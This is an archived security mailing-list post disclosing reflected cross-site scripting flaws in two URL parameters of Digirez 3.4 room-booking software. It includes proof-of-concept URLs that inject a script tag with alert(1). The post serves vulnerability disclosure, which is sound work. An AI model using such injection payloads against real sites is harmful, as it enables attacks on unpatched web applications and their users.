Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple XSS in Digirez

from [xx_hack_xx_2004] Network Security [Permanent Link]
Subject: Multiple XSS in Digirez
Date: 25 May 2007 10:03:24 -0000 
Hello 
Vulnerable : Digirez 
Version: 3.4
web : http://www.digiappz.com


XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script>

Discovered  By Linux_Drox
www.LeZr.Com

Best regards ,,
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple XSS in Digirez, xx_hack_xx_2004 <=
Previous by Date:  Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60), diabol the japanophile
Next by Date:  Pligg critical vulnerability, 242th section
Previous by Thread:  [Full-disclosure] n.runs-SA-2007.009 - Avast! Antivirus SIS parsing Arbitrary Code Execution Advisory, security
Next by Thread:  Pligg critical vulnerability, 242th section
Indexes:  [Date] [Thread] [Top] [All Lists]